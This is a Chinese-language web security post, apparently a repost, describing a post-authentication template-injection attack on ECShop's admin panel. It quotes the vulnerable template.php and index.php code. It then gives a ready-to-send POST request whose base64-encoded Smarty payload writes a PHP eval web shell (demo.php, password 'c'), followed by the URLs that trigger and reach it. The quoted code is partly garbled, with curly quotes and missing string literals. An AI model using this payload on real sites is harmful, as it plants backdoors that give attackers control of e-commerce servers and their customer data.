admin/template.phpif ($_REQUEST['act'] == ‘update_library’) { check_authz_json(‘library_manage’); $ html = stripslashes(json_str_iconv($_POST['html'])); $lib_file = ‘themes/’ . $_CFG['template'] . ‘/library/’ . $_POST['lib'] . ‘.lbi’; //模板文件 $lib_file = str_replace([0xa], ], $lib_file); // 过滤 0xa 非法字符 $org_html = str_replace([\xEF\xBB\xBF], ], file_get_contents($lib_file)); if (@file_exists($lib_file) === true && @file_put_contents($lib_file, $html))//写出 { @file_put_contents(‘temp/backup/library/’ . $_CFG['template'] . ‘-’ . $_POST['lib'] . ‘.lbi’, $org_html); make_json_result(], $_LANG['update_lib_success']); } else { make_json_error(sprintf($_LANG['update_lib_failed'], ‘themes/’ . $_CFG['template'] . ‘/library’)); } } 那么找个比较方便调用了模板的文件 index.php if ($act == ‘cat_rec’) { $rec_array = array(1 => ‘best’, 2 => ‘new’, 3 => ‘hot’); $rec_type = !empty($_REQUEST['rec_type']) ? intval($_REQUEST['rec_type']) : ’1′; $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : ’0′; include_once(‘includes/cls_json.php’); $json = new JSON; $result = array(‘error’ => 0, ‘content’ => ], ‘type’ => $rec_type, ‘cat_id’ => $cat_id);
$children = get_children($cat_id); $smarty->assign($rec_array[$rec_type] . ‘_goods’, get_category_recommend_goods($rec_array[$rec_type], $children)); // 推荐商品 $smarty->assign(‘cat_rec_sign’, 1); $result['content'] = $smarty->fetch(‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’);//使用了模板文件 该模板文件为recommend_best echo ‘library/recommend_’ . $rec_array[$rec_type] . ‘.lbi’; echo $rec_array[$rec_type]; die($json->encode($result)); } 那么就有利用方法了 post包到http:// HdhCmsTest2cto测试数据 /ec/admin/template.php?act=update_library Post内容: lib=recommend_best&html={if fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if} 复制代码 然后访问http://localhost/ec/index.php?act=cat_rec shel地址:http://localhost/ec/demo.php 密码c
查看更多关于利用post在Ecshop后台getshell的方法 - 网站安全 - 自的详细内容...